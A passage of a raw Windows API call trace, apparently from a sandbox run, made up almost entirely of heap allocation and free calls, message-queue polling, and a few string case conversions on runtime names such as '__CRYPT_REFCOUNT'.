0x2e507d0 [0152.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0152.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.683] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.683] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.683] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0152.683] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0152.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0152.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0152.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.684] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.684] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0152.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0152.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0152.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0152.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0152.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0152.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0152.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0152.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0152.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0152.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0152.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14189) returned 0x2e944c8 [0152.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e944c8 | out: hHeap=0x970000) returned 1 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0152.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0152.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0152.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.803] 